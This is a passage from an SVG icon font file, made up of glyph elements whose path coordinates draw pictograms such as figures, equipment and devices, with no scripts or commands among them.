9.601h75.753v16.656h47.052v-16.656h75.762c5.256 0 9.521-4.274 9.521-9.601 0-5.186-4.26-9.498-9.521-9.498h-75.762v-30.091h96.998c5.294 0 9.554-4.345 9.554-9.559 0-5.294-4.26-9.531-9.554-9.531h-96.998v-30.123h103.339c5.256 0 9.531-4.307 9.531-9.521 0-5.294-4.274-9.531-9.531-9.531h-103.339v-30.156h91.554c5.261 0 9.531-4.242 9.531-9.498 0-5.266-4.27-9.512-9.531-9.512l-91.554-0.019zM667.671 671.298h-283.958c-51.369 0-98.919-27.404-125.642-68.289h531.104c-25.027 40.88-70.149 68.289-121.504 68.289z" />
<glyph unicode="&#xe608;" d="M493.225 652.429c52.088 0 94.274 42.144 94.274 94.095 0 51.975-42.172 94.067-94.274 94.067-52.078 0-94.283-42.106-94.283-94.067 0.019-51.952 42.219-94.095 94.283-94.095zM780.485 16.328c0 0-732.888 0-751.588 0-21.161 0-18.991-16.642-18.991-16.642v-27.695c0 0-1.926-35.986 35.037-35.986 28.226 0 941.070 0 941.070 0 37.202 0 35.187 35.145 35.187 35.145v76.697c0 0-3.147 24.257-31.688 24.257h-91.714c-31.434 0-57.424-55.775-117.314-55.775zM853.57 186.265c0-46.747 38.043-84.724 84.922-84.724 46.869 0 85.006 37.977 85.006 84.724 0 46.921-38.146 84.757-85.006 84.757-46.883 0.014-84.922-37.822-84.922-84.757zM575.958 347.92c-5.613-16.849-18.347-31.086-36.296-37.756l-75.635-28.047 27.902-27.695h127.685l-0.075 195.438-42.736-100.756c-0.211-0.479-0.597-0.752-0.846-1.184zM759.329 207.98h-264.004l-63.643 62.14-44.304-16.328c-32.871-11.753-72.873 6.186-85.217 38.851-7.271 20.278-6.261 42.905 5.872 59.411-5.421 0.244-160.115 0-160.115 0-25.732 0-46.644-20.705-46.644-46.371 0-25.713 20.912-45.808 46.644-45.808h157.494l62.455-94.537-322.419-25.901c-20.63-4.758-36.051-23.223-36.051-45.319 0-25.736 20.799-46.615 46.465-46.615l361.74-0.047c-6.266 10.174-10.071 22.025-10.071 34.825 0 36.836 29.94 66.767 66.762 66.767h144.741l117.3 24.501 6.515-31.157-120.522-25.173h-148.029c-19.296 0-34.938-15.632-34.938-34.938 0-19.024 15.247-34.436 34.234-34.825l286.372-0.038c44.319 0.362 79.867 36.051 79.867 80.215-0.014 44.333-35.882 80.346-80.501 80.346zM381.792 282.958c-18.681-8.136-40.453 0.324-48.612 18.958-8.22 18.709 0.282 40.457 18.986 48.635l134.416 50.463 41.542 99.065-27.066 10.005-35.319-84.837-102.315-37.686v103.711l-100.018-109.239-113.19 0.108c0 0 198.064 217.116 204.255 223.617 8.215 8.145 26.981 21.645 62.375 21.645h127.183c72.248 0 86.166-72.037 71.37-109.314l-66.518-161.313c-4.091-9.268-11.785-16.718-21.401-20.175l-145.69-53.643z" horiz-adv-x="1029" />
<glyph unicode="&#xe609;" d="M660.682 452.913h-35.723l-37.625-68.162-49.443 90.455c24.773 16.046 38.048 44.272 38.048 80.464 0 55.052-27.113 93.842-88.834 93.842h-102.132v-322.231h51.477v133.143h45.136c3.772 0 6.994 0.578 10.564 0.869l68.533-124.801-56.832-102.921h36.004l38.738 70.322 38.635-70.313h52.778l-64.822 118.573 55.498 100.761zM473.003 499.256h-36.554v111.47h33.022c41.059 0 55.014-21.236 55.014-55.958 0-40.622-23.904-55.512-51.482-55.512zM294.874-29.766c0-18.841 15.787-34.234 35.258-34.234h386.654c19.503 0 35.187 15.393 35.187 34.234v779.513h-457.099v-779.513zM340.226 698.988h366.756v-504.724h-366.756v504.724zM272.487 782.956h501.802c10.202 0 18.385 8.004 18.385 17.953v130.071c0 9.921-8.183 17.887-18.385 17.887h-501.802c-10.132 0-18.423-7.971-18.423-17.887v-130.071c0-9.949 8.3-17.953 18.423-17.953zM727.134 925.499h24.801v-118.751h-24.801v118.751zM671.753 925.499h24.708v-118.751h-24.708v118.751zM616.237 925.499h24.839v-118.751h-24.839v118.751z" horiz-adv-x="1029" />
<glyph unicode="&#xe60a;" d="M429.483 711.671c13.871 0 25.149 11.208 25.149 25.149 0 13.833-11.273 25.107-25.149 25.107-13.871 0-25.144-11.273-25.144-25.107 0-13.941 11.273-25.149 25.144-25.149zM470.918 620.722c-17.056 0-26.295 17.333-26.366 17.516-3.922 7.492-13.166 10.4-20.626 6.478-7.426-3.856-10.4-13.025-6.595-20.527 0.667-1.329 17.582-34.107 53.586-34.107 14.111 0 25.84 3.011 35.258 8.718 9-6.2 20.63-9.568 34.882-9.568 32.965 0 48.504 34.29 49.185 35.76 0.869 1.996 1.329 4.063 1.329 6.13 0 5.876-3.429 11.489-9.080 13.974-3.706 1.682-7.877 1.855-11.691 0.38-3.824-1.395-6.863-4.35-8.554-8.098-0.033-0.132-8.23-17.544-21.189-17.544-11.452 0-16.53 2.908-18.667 4.763 0 3.152 0 19.367 0 25.877 10.263 1.959 18.296 11.067 18.296 22.101 0 12.744-10.334 23.571-22.495 23.571l-21.316-0.178c-12.885 0-23.359-10.541-23.359-23.392 0-11.067 7.774-20.452 18.249-22.833 0-6.163 0-20.522 0-24.092-2.743-1.992-8.836-4.927-20.846-4.927zM321.691 947.115c77.547 3.781 92.418-53.614 92.418-53.614s35.976 21.993 92.141 21.993c56.151 0 92.071-21.993 92.071-21.993s14.918 57.396 92.461 53.614c45.188-2.17 82.056-39.922 82.056-85.166 0-42.374-27.878-99.248-73.343-100.686l-5.773-0.174c1.292-7.703 1.785-29.17 1.785-34.844 0-104.396-84.931-189.388-189.252-189.388-104.359 0-189.29 84.992-189.29 189.388 0 5.674 0.456 27.141 1.832 34.844l-5.857 0.174c-45.418 1.437-73.263 58.312-73.263 100.686-0.005 45.244 36.841 82.996 82.014 85.166zM403.677 290.191v74.987h66.297v66.292h74.907v-66.292h66.367v-74.996h-66.367v-66.292h-74.902v66.292l-66.302 0.009zM162.454 299.342c-3.363 84.438 41.674 154.511 86.119 211.945l6.116 8.159c14.576 19.752 24.163 32.81 68.5 29.734 33.947-2.419 68.228-27.737 68.228-71.581 0-0.103 0-0.207 0-0.348-0.127-26.37-17.366-50.044-35.582-75.015-22.166-30.363-47.268-64.723-47.268-111.466 0-13.378 2.931-23.759 5.815-33.656 2.767-9.78 5.392-18.953 5.392-30.781 0-40.274-34.041-73.061-75.851-73.061-50.237-0.009-77.622 49.166-81.469 146.070zM383.399-51.045c-55.512 0-100.686 45.108-100.686 100.615 0 55.503 45.178 100.61 100.686 100.61 55.47 0 100.61-45.108 100.61-100.61 0-55.512-45.136-100.615-100.61-100.615zM630.784-51.045c-55.493 0-100.686 45.108-100.686 100.615 0 55.503 45.188 100.61 100.686 100.61 55.512 0 100.7-45.108 100.7-100.61 0-55.512-45.188-100.615-100.7-100.615zM768.521 153.262c-41.81 0-75.851 32.773-75.851 73.056 0 11.828 2.621 21.015 5.392 30.786 2.894 9.897 5.81 20.273 5.81 33.656 0 46.742-25.074 81.112-47.25 111.47-18.244 25.003-35.441 48.631-35.582 75.001 0 0.141 0 0.244 0 0.357 0 43.844 34.252 69.172 68.228 71.586 44.262 3.081 53.906-9.982 68.462-29.738l6.163-8.159c44.459-57.438 89.375-127.507 86.119-211.94-3.88-96.9-31.302-146.075-81.493-146.075zM583.332 711.671c13.904 0 25.182 11.208 25.182 25.149 0 13.833-11.278 25.107-25.182 25.107-13.833 0-25.111-11.273-25.111-25.107 0-13.941 11.273-25.149 25.111-25.149z" horiz-adv-x="1019" />
<glyph unicode="&#xe60b;" d="M617.205 112.563l-232.523 134.252 23.038 39.852 232.495-134.214zM854.498 36.090c67.238 63.39 109.75 152.539 109.75 251.974 0 122.595-64.33 233.079-164.429 295.164l112.088 194.12-17.623 10.212 27.727 48.011-72.48 41.853-27.718-47.969-18.605 10.698-275.629-477.497 24.122-13.929-34.189-59.191 60.477-34.891 34.194 59.121 24.057-13.92 115.894 200.798c71.152-45.28 116.671-124.643 116.671-212.585 0-138.974-113.070-251.974-252.044-251.974-92.992 0-203.121 0-203.121 0v-95.41h571.729v95.405c-0.009 0.009-84.618 0.009-130.871 0.009zM260.32 941.517c-128.893 0-233.781-104.902-233.781-233.739 0-128.912 104.888-233.776 233.781-233.776 128.856 0 233.706 104.864 233.706 233.776 0 128.846-104.85 233.739-233.706 233.739zM260.32 495.646c-116.956 0-212.174 95.176-212.174 212.136 0 116.923 95.218 212.132 212.169 212.132 116.9 0 212.099-95.209 212.099-212.132 0.005-116.965-95.195-212.136-212.094-212.136zM139.32 723.166c10.263 0 34.666 0 44.878 0 0 10.315 0 35.204 0 45.519-10.212 0-34.615 0-44.878 0 0-10.315 0-35.209 0-45.519zM260.517 891.687c-101.46 0-183.988-82.579-183.988-184.044 0-101.437 82.528-183.913 183.988-183.913 101.409 0 183.918 82.476 183.918 183.913 0 101.465-82.514 184.044-183.918 184.044zM123.521 707.184v77.441h76.884v-77.441h-76.884zM202.705 565.615c-21.027 0-38.108 17.057-38.108 38.112 0 21.116 17.071 38.187 38.108 38.187 21.008 0 38.075-17.067 38.075-38.187 0-21.055-17.062-38.112-38.075-38.112zM248.818 650.303c-21.041 0-38.145 17.062-38.145 38.108 0 21.050 17.095 38.145 38.145 38.145 21.013 0 38.075-17.095 38.075-38.145 0-21.046-17.062-38.108-38.075-38.108zM275.531 794.692c-22.149 0-40.128 18.049-40.128 40.179 0 22.238 17.978 40.137 40.128 40.137 22.163 0 40.118-17.899 40.118-40.137 0-22.126-17.955-40.179-40.118-40.179zM342.114 590.228c-21.135 0-38.178 17.057-38.178 38.145 0 21.060 17.039 38.117 38.178 38.117 21.004 0 38.075-17.057 38.075-38.117 0.005-21.088-17.062-38.145-38.075-38.145zM350.194 702.256c-21.046 0-38.108 17.095-38.108 38.145 0 21.083 17.053 38.145 38.108 38.145 21.083 0 38.169-17.057 38.169-38.145-0.014-21.050-17.090-38.145-38.169-38.145z" horiz-adv-x="1015" />
<glyph unicode="&#xe60c;" d="M478.484 782.759c45.93-3.596 86.194 30.697 89.85 76.622 3.563 45.996-30.823 86.231-76.73 89.86-45.93 3.628-86.161-30.697-89.822-76.664-3.591-46.001 30.669-86.156 76.702-89.817zM501.381 615.375c26.049-4.886 45.626-27.896 45.626-55.422 0-31.174-25.273-56.446-56.446-56.446h-182.908c-19.774 0-35.826 16.038-35.826 35.826 0 4.816 0.949 9.398 2.642 13.588l19.774 46.159 220.254 157.766h-104.948c-40.301 1.113-68.622-12.882-84.87-44.626-11.012-21.368-69.468-151.968-69.468-151.968-2.567-6.467-3.993-13.522-3.993-20.92 0-31.174 25.259-56.446 56.446-56.446h71.437l-21.079-138.553-110.877-320.423c-9.328-28.429 6.107-58.737 34.292-68.15 28.223-9.431 58.822 6.041 68.15 34.33l127.504 361.439c24.861-40.404 74.355-112.822 82.766-126.494 1.936-22.734 19.746-223.171 19.746-223.171 2.712-29.79 28.901-51.499 58.513-48.942 29.649 2.53 51.593 28.854 48.951 58.504l-20.962 235.885c-0.711 8.379-3.423 16.454-7.841 23.543l-91.66 148.559 14.598 186.443c0 0 21.71-73.779 23.328-79.105 4.657-15.229 15.159-26.161 25.927-34.872 6.308-5.022 113.295-77.843 113.295-77.843 5.952-2.754 10.81-5.162 17.198-5.602 20.69-1.697 38.87 13.77 40.535 34.531 1.019 13.298-4.919 25.408-14.719 32.974 0 0-106.613 73.2-110.952 76.389-3.53 2.679-6.312 7.327-7.023 9.768l-42.194 151.963c-6.864 22.996-30.033 42.774-59.327 42.774h-12.62l-53.267-141.457zM490.557 524.136c19.774 0 35.826 16.033 35.826 35.821 0 18.465-14.055 33.493-31.987 35.429l-26.166-71.47 22.327 0.22z" />
<glyph unicode="&#xe60d;" d="M791.618 266.681v-324.551h-407.991v117.062h-59.93c-83.227 0-150.759 67.49-150.759 150.83v106.869h-51.261c-17.026 0-30.923 13.864-30.923 30.829 0 4.285 0.764 8.352 2.298 11.986l79.886 201.162c0 0 8.258 83.331 15.775 115.235 33.259 143.53 193.272 273.776 366.762 273.776 211.071 0 382.263-171.206 382.263-382.466 0.005-122.002-57.146-230.735-146.121-300.73zM266.858 569.993c-23.396 0-42.513-19.083-42.513-42.593 0-23.656 19.116-42.772 42.513-42.772 23.618 0 42.838 19.116 42.838 42.772-0.005 23.505-19.225 42.593-42.838 42.593zM637.249 662.795c0-22.32 18.073-40.323 40.252-40.323 22.25 0 40.252 17.998 40.252 40.323 0 22.368-18.003 40.37-40.252 40.37-22.179 0-40.252-18.003-40.252-40.37zM332.984 706.51c0-22.287 18.073-40.337 40.398-40.337 22.358 0 40.398 18.054 40.398 40.337 0 22.358-18.040 40.431-40.398 40.431-22.311-0.005-40.398-18.078-40.398-40.431zM810.838 617.979l58.505 10.061v56.32l-56.372 9.716c-2.652 10.207-6.522 20.022-11.354 29.323l34.165 48.51-39.629 39.78-46.835-32.985c-6.97 4.077-14.312 7.739-22.155 10.632-2.194 0.802-4.384 1.392-6.578 2.057l-10.207 58.472h-56.311l-9.509-56.315c-10.278-2.647-20.136-6.512-29.493-11.396l-48.444 34.24-39.945-39.851 33.188-46.632c-4.148-7.036-7.8-14.449-10.693-22.358-0.845-2.194-1.397-4.389-2.095-6.578l-48.336-8.291v26.851l-36.916 6.337c-1.67 6.441-4.181 12.571-7.239 18.456l22.627 31.971-26.152 26.091-30.786-21.707c-4.492 2.61-9.126 5.054-14.176 6.937-1.288 0.486-2.647 0.59-3.969 1.010l-6.687 38.511h-36.746l-6.437-36.954c-6.479-1.704-12.642-4.247-18.564-7.324l-32.037 22.537-26.015-26.091 21.768-30.786c-2.614-4.459-5.054-9.089-6.894-14.138-0.491-1.326-0.802-2.647-1.217-4.011l-38.308-6.578v-36.949l37.161-6.375c1.699-6.347 4.039-12.51 7.036-18.361l-22.604-32.004 26.048-26.124 30.89 21.764c4.492-2.647 9.159-5.082 14.209-6.97 1.288-0.491 2.647-0.595 3.936-1.043l6.687-38.516 36.732 0.033 6.441 36.916c6.441 1.704 12.571 4.214 18.493 7.281l31.9-22.5 26.147 26.086-21.731 30.786c2.614 4.459 5.021 9.051 6.861 14.067 0.524 1.326 0.628 2.718 1.081 4.077l28.346 4.889v-46.222l56.278-9.683c2.652-10.278 6.522-20.131 11.424-29.493l-34.165-48.34 39.709-39.818 46.802 32.985c6.998-4.077 14.308-7.697 22.179-10.584 2.194-0.84 4.389-1.387 6.583-2.090l10.202-58.514h48.869l-4.039-23.434c-7.064-1.604-13.718-4.384-19.985-7.904l-23.363 16.507-18.319-18.328 15.813-22.391c-2.718-4.318-5.087-8.919-6.899-13.864-0.727-1.987-1.010-3.969-1.567-5.955l-28.351-4.842v-25.845l27.129-4.7c1.567-7.102 4.346-13.751 7.904-20.060l-16.507-23.33 18.248-18.39 22.391 15.879c4.323-2.751 8.947-5.115 13.925-6.965 1.982-0.731 4.006-1.015 6.026-1.571l4.662-28.21h25.944l4.733 27.025c7.107 1.571 13.756 4.351 20.060 7.904l23.231-16.497 18.385 18.352-15.808 22.254c2.789 4.346 5.191 8.985 7.036 13.996 0.694 1.949 0.972 3.936 1.529 5.917l28.106 4.842v25.944l-26.987 4.629c-1.567 7.069-4.351 13.756-7.904 20.022l16.464 23.368-18.347 18.323-22.358-15.709c-4.28 2.723-8.881 5.087-13.864 6.937-1.911 0.694-3.86 0.977-5.814 1.496l-4.945 28.21h-18.526l8.947 52.767c10.24 2.61 20.060 6.479 29.394 11.349l48.506-34.236 39.766 39.78-33.051 46.802c4.105 7.003 7.767 14.35 10.693 22.217 0.816 2.204 1.378 4.403 2.072 6.597zM668.035 372.479c0-22.32 18.144-40.365 40.427-40.365 22.179 0 40.191 18.040 40.191 40.365 0 22.292-18.003 40.332-40.191 40.332-22.287 0-40.427-18.040-40.427-40.332z" />
<glyph unicode="&#xe60e;" d="M49.503 864.632v-211.477h-31.646c-5.98 0-10.848 4.816-10.848 10.848v272.898c0 9.235 6.883 16.758 16.342 16.758h139.825c9.426 0 16.347-7.495 16.347-16.721v-16.029h216.186c6.013 0 10.848-4.849 10.848-10.81v-61.375h-184.549v16.071c0 9.216-6.883 16.721-16.375 16.721h-139.76c-9.487-0.009-16.37-7.622-16.37-16.884zM491.557 525.081c0-5.999-4.835-10.81-10.848-10.81h-377.842c-6.013 0-10.843 4.816-10.843 10.81v272.917c0 9.235 6.883 16.753 16.328 16.753h139.797c9.464 0 16.379-7.495 16.379-16.721v-16.024h216.176c6.013 0 10.848-4.853 10.848-10.81v-246.115h0.005zM323.981 680.443v64.376h-64.39v-64.376h-64.395v-64.39h64.395v-64.376h64.39v64.376h64.358v64.39h-64.358zM568.783 784.354v-824.086h452.907v824.086h-452.907zM993.285 76.849h-396.194v311.259h396.194v-311.259zM993.285 443.969h-396.194v311.212h396.194v-311.212zM964.533 728.646h-339.023v-258.296h339.023v258.296zM850.219 642.060h-111.639c-8.688 0-15.711 7.009-15.711 15.734 0 8.674 7.028 15.729 15.711 15.729h111.639c8.725 0 15.743-7.056 15.743-15.729 0.005-8.725-7.018-15.734-15.743-15.734zM964.739 361.638h-338.981v-258.24h338.981v258.24zM850.219 274.977h-111.639c-8.688 0-15.711 7.046-15.711 15.692 0 8.734 7.028 15.785 15.711 15.785h111.639c8.725 0 15.743-7.051 15.743-15.785 0.005-8.646-7.018-15.692-15.743-15.692z" horiz-adv-x="1029" />
<glyph unicode="&#xe60f;" d="M241.776 827.32v106.795h-106.795v-106.795h-106.795v-106.8h106.795v-106.786h106.795v106.786h106.795v106.8zM578.817 495.81c73.681 0 133.457 59.832 133.457 133.485 0 73.747-59.775 133.438-133.457 133.438-73.681 0-133.452-59.691-133.452-133.438 0-73.653 59.771-133.485 133.452-133.485zM369.776-56.35v118.433l-118.77-33.049c-8.716-3.469-18.189-5.401-28.078-5.401-41.993 0-76.043 34.138-76.043 76.080 0 15.785 4.793 30.435 12.975 42.55l190.511 261.232c20.686 28.326 49.563 59.892 110.475 59.892h230.316c60.884 0 89.789-31.566 110.442-59.892l190.506-261.232c8.197-12.115 13.013-26.764 13.013-42.55 0-41.947-34.082-76.080-76.043-76.080-9.889 0-19.4 1.931-28.078 5.401l-118.803 33.049v-118.433h-412.424zM576.002 26.383v0l153.899 50.924-3.469 0.959c-106.173 31.253-64.835 171.541 41.334 140.213l14.509-4.877v158.43l-206.268-67.388-206.259 67.388v-158.43l14.439 4.877c106.248 31.323 147.578-108.96 41.339-140.213l-3.404-0.959 153.881-50.924z" />
<glyph unicode="&#xe610;" d="M456.901 365.131c-37.362 0-67.589-30.433-67.589-68.087 0-37.564 30.227-68.119 67.589-68.119 37.301 0 67.495 30.556 67.495 68.119-0.009 37.653-30.199 68.087-67.495 68.087zM611.849 365.131c-37.334 0-67.565-30.433-67.565-68.087 0-37.564 30.236-68.119 67.565-68.119 37.324 0 67.509 30.556 67.509 68.119 0 37.653-30.185 68.087-67.509 68.087zM327.727 338.239l-46.93-163.943h45.357l45.775 163.943zM10.691 419.92v-245.624h154.525l74.052 245.624zM527.975 562.364c83.292 0 128.573 58.063 128.573 129.696 0 71.586-57.499 129.574-128.573 129.574-70.999 0-128.587-57.988-128.587-129.574 0-71.633 57.593-129.696 128.587-129.696zM698.965 366.907c-3.471-9.676-4.397-21.847 2.325-45.54l41.608-147.071h184.325v-233.486h82.686v1007.578h-82.686v-528.469h-201.216l-27.042-53.013zM259.786-59.19h549.334l-66.212 233.486h-417.139zM857.567 684.657l-54.075 220.31c-7.323 29.823-37.287 48.048-66.781 40.65-29.616-7.398-47.649-37.526-40.359-67.349l48.795-198.741-85.626-151.265h-250.885c-89.6 0-150.664-63.883-166.63-100.756l-2.738-7.591h486.748l125.938 223.786c6.99 12.405 9.019 27.080 5.613 40.955zM170.952-60.538c-5.125 0-10.32 0.728-15.482 2.194-29.259 8.634-46.042 39.494-37.554 69.007l47.306 163.633h115.58l-56.926-194.767c-7.008-24.308-29.048-40.068-52.924-40.068v0z" />
<glyph unicode="&#xe611;" d="M605.635 134.863l-247.428 142.9 24.52 42.411 247.376-142.9zM858.098 53.511c71.464 67.481 116.741 162.299 116.741 268.128 0 130.391-68.476 247.991-174.963 314.039l119.291 206.5-18.733 10.794 29.424 51.167-77.143 44.535-29.494-51.087-19.724 11.386-293.282-508.031 25.619-14.778-36.375-62.906 64.446-37.216 36.38 62.938 25.577-14.782 123.322 213.579c75.612-48.208 124.139-132.669 124.139-226.14 0-147.841-120.353-268.124-268.208-268.124-98.994 0-216.097 0-216.097 0v-101.526h608.294v101.526c-0.005-0.005-90.065-0.005-139.212-0.005zM318.135 834.165v80.586h9.916l-0.146 19.324h-90.389l0.141-19.324h10.649v-80.586h-67.443v80.586h9.883l-0.108 19.324h-90.469l0.183-19.324h10.649v-80.586h-99.027v-403.7h404.306v403.7h-98.144zM382.060 464.647h-335.872v335.337h64.808v-257.916c0-19.517 15.957-35.37 35.206-35.37 19.282 0.075 34.656 15.881 34.656 35.37v257.916h67.443v-257.916c0-19.517 15.961-35.37 35.211-35.37 19.282 0.075 34.652 15.881 34.619 35.37v257.916h63.925v-335.337h0.005z" />
<glyph unicode="&#xe612;" d="M513.86 706.997c-70.91 0-128.493 57.090-128.493 127.479 0 70.365 57.579 127.422 128.493 127.422 70.924 0 128.474-57.048 128.474-127.422 0-70.388-57.546-127.479-128.474-127.479zM861.649 112.814c-28.775-8.248-58.194 6.229-65.747 32.599l-98.374 343.411-47.973 0.070 157.193-547.939h-585.794l157.236 547.939-48.048-0.070-98.332-343.411c-7.563-26.375-37.010-40.847-65.719-32.599-28.78 8.253-46.958 33.393-37.301 66.316l101.174 352.345c40.415 140.809 158.297 136.417 158.297 136.417h251.209c0 0 117.849 4.397 158.316-136.417l101.141-352.345c9.681-32.923-8.516-58.067-37.277-66.316zM513.898 353.365c-104.937 0-189.98-84.983-189.98-189.938 0-104.875 85.039-189.947 189.98-189.947 104.833 0 189.882 85.058 189.882 189.947 0 104.955-85.030 189.938-189.882 189.938zM554.726 209.666c-22.819 10.743-32.524 37.944-21.72 60.778 10.794 22.721 38.005 32.449 60.759 21.668 22.796-10.818 32.449-38.024 21.687-60.815-10.818-22.721-37.973-32.453-60.726-21.631zM597.236 146.098c-4.5-9.55-28.526-60.195-33.407-70.365-13.481-28.465-47.56-40.626-76.086-27.164-9.244 4.453-16.342 11.283-22.288 18.78-9.023 11.4-15.078 41.787-15.078 41.787-9.479-6.689-33.717-21.96-43.741-29.085-9.122-6.365-21.729-4.199-28.155 4.923-6.478 9.122-4.232 21.706 4.829 28.146 14.435 10.094 54.45 37.301 54.45 37.301 12.175 8.54 28.944 5.759 37.489-6.478l16.99-34.515 27.009 54.591-23.599 6.91c-5.19 1.48-9.46 5.064-11.978 9.841l-23.153 44.464c-5.026 9.629-1.301 21.527 8.375 26.521 9.606 5.059 21.485 1.268 26.535-8.319 0 0 13.927-26.774 19.282-37.089 12.72-3.734 64.446-18.775 64.446-18.775 2.8-0.874 5.153-2.457 7.276-4.307 12.288-7.826 17.187-23.669 10.804-37.165z" />
<glyph unicode="&#xe613;" d="M531.334 551.302c30.471 9.742 63.004-7.046 72.774-37.554 9.747-30.396-7.065-63.009-37.54-72.789l-157.409-50.298c-18.221-5.843-38.198-2.25-53.295 9.559l-65.109 50.937 141.368-508.43h-411.845v645.947c0 38.156 30.96 69.078 69.106 69.078h102.959c14.693 0 28.221-4.683 39.354-13.382 0 0 134.318-105.059 171.384-134.069l128.254 41.002zM279.773 356.516h-62.464v62.549h-74.55v-62.544h-62.248v-74.775h62.243v-62.22h74.55v62.22h62.464v74.771zM154.488 688.781c68.631 0 124.275 55.62 124.275 124.322 0 68.594-55.639 124.289-124.275 124.289-68.66 0-124.308-55.695-124.308-124.289-0.005-68.693 55.639-124.322 124.308-124.322zM885.92 688.335c68.688 0 124.458 55.733 124.458 124.435 0 68.815-55.77 124.585-124.458 124.585-68.782 0-124.501-55.77-124.501-124.585 0-68.702 55.719-124.435 124.501-124.435zM848.323 654.904c-50.937 0-74.043-17.431-93.391-47.597l-12.518-24.064-72.746 21.25 3.072 19.832-173.718 38.907-4.871-21.668-32.496 7.234 4.833 21.734-13.044 2.884-14.918-66.565 12.969-2.884 4.979 21.734 32.496-7.271-4.871-21.772 173.756-38.907 5.618 20.391 70.388-11.32-181.356-348.794c-14.017-28.033-2.659-62.060 25.412-76.114 28.024-14.054 62.093-2.659 76.227 25.375l151.289 293.616h24.82v-518.177h178.359v712.178h-160.289z" />
<glyph unicode="&#xe614;" d="M881.669 85.697c26.366 32.209 35.605 77.016 20.264 118.981l-13.894 38.367h84.292v710.623h-914.254v-710.623h491.656l53.628-147.127c15.228-41.899 51.144-70.36 92.019-78.021l25.201-76.274 210.967-0.038-49.88 144.112zM804.972 469.626c-45.051-16.384-68.321-66.297-51.9-111.405l32.514-88.703h-701.050v657.652h861.372v-657.657h-67.659l-73.277 200.112zM554.566 547.3v-50.716h148.208c6.191 0 15.224-5.533 15.224-15.228 0-86.354-10.855-127.164-56.358-127.164-47.287 0-56.982 102.386-107.074 109.070v-97.867h-79.252v98.003c-52.609-3.955-61.078-109.206-110.188-109.206-45.502 0-53.901 40.81-53.901 127.164 0 9.7 9.028 15.228 15.261 15.228h148.837v50.716h-154.126c-8.892 0-16.102 7.177-16.102 16.036 0 8.854 7.21 15.999 16.102 15.999h154.121v50.754h-173.474c-8.821 0-15.999 7.177-15.999 16.065 0 8.821 7.177 16.036 15.999 16.036h173.479v50.726h-162.839c-8.821 0-15.999 7.173-15.999 16.069 0 8.854 7.177 16.065 15.999 16.065h162.839v50.716h-127.516c-8.925 0-16.065 7.177-16.065 16.036 0 8.864 7.14 16.102 16.065 16.102h127.516v28.038h79.247v-28.038h127.521c8.85 0 16.060-7.248 16.060-16.102s-7.21-16.036-16.060-16.036h-127.521v-50.716h163.295c8.854 0 16.065-7.21 16.065-16.065 0-8.897-7.21-16.069-16.065-16.069h-163.295v-50.726h173.967c8.826 0 16.036-7.21 16.036-16.036 0-8.887-7.21-16.065-16.036-16.065h-173.967v-50.754h154.126c8.882 0 16.060-7.14 16.060-15.999 0-8.859-7.177-16.036-16.060-16.036h-154.131z" />
<glyph unicode="&#xe615;" d="M877.648 88.402c26.215 32.002 35.295 76.542 20.198 118.164l-13.871 38.184h83.658v705.794h-908.072v-705.794h488.345l53.239-146.268c15.125-41.618 50.838-69.848 91.451-77.434l23.439-77.965h215.139l-53.525 145.319zM850.906 334.576l-19.888 54.070-29.456 81.187c-44.887-16.375-68.049-65.921-51.665-110.742l32.298-88.153h-696.456v653.354h855.712v-653.354h-67.175l-23.369 63.638zM349.903 648.117c-16.516-13.768-40.124-20.649-70.797-20.649h-58.767v-101.503h-58.626v282.295h121.217c27.958 0 50.209-7.3 66.837-21.838 16.624-14.571 24.928-37.104 24.928-67.603 0.005-33.36-8.272-56.893-24.792-70.703zM304.875 749.836c-7.473 6.257-17.948 9.39-31.406 9.39h-53.131v-83.146h53.131c13.458 0 23.923 3.41 31.406 10.155 7.478 6.783 11.189 17.493 11.189 32.2 0.009 14.67-3.711 25.135-11.189 31.401zM622.874 758.249h-149.349v-59.951h137.113v-49.030h-137.113v-72.572h156.268v-50.735h-213.922v282.295h207.003v-50.007zM888.663 808.246v-50.002h-84.428v-232.288h-59.392v232.288h-84.842v50.002h228.662z" horiz-adv-x="1038" />
<glyph unicode="&#xe616;" d="M877.072 82.895c26.414 32.277 35.602 77.244 20.349 119.191l-13.962 38.515h84.431v711.975h-916.204v-711.979h492.736l53.683-147.535c15.295-41.984 51.322-70.464 92.249-78.109l23.603-78.647h217.111l-53.996 146.591zM850.102 331.203l-20.026 54.576-29.813 81.897c-45.21-16.562-68.622-66.532-52.065-111.71l32.632-88.948h-702.665v659.105h863.316v-659.105h-67.804l-23.575 64.185zM364.376 809.009h85.628v-284.751h-55.46v192.601c0 5.545 0.070 13.293 0.201 23.295 0.14 9.955 0.178 17.675 0.178 23.075l-53.945-238.975h-57.844l-53.571 238.975c0-5.401 0.070-13.12 0.173-23.075 0.136-10.002 0.21-17.749 0.21-23.295v-192.606h-55.46v284.751h86.605l51.813-223.887 51.471 223.891zM687.553 801.673c10.488-4.526 19.395-11.152 26.657-19.886 6.032-7.224 10.806-15.22 14.345-23.959 3.507-8.767 5.26-18.764 5.26-29.953 0-13.541-3.404-26.834-10.24-39.885-6.813-13.083-18.1-22.341-33.811-27.746 13.148-5.26 22.449-12.765 27.919-22.519 5.475-9.716 8.211-24.557 8.211-44.514v-19.115c0-13.013 0.524-21.855 1.576-26.484 1.585-7.332 5.228-12.732 10.983-16.244v-7.117h-65.662c-1.828 6.28-3.086 11.4-3.895 15.262-1.543 7.963-2.38 16.174-2.488 24.515l-0.379 26.488c-0.248 18.165-3.404 30.271-9.403 36.298-6.032 6.069-17.361 9.085-33.923 9.085h-58.13v-111.644h-58.158v284.747h136.248c19.423-0.383 34.437-2.843 44.888-7.332zM564.565 759.548v-76.501h64.054c12.732 0 22.28 1.543 28.625 4.629 11.259 5.401 16.87 16.094 16.87 32.090 0 17.258-5.438 28.836-16.314 34.765-6.135 3.334-15.299 5.017-27.545 5.017h-65.69zM845.123 524.258h-59.135v284.751h59.135v-284.751z" horiz-adv-x="1015" />
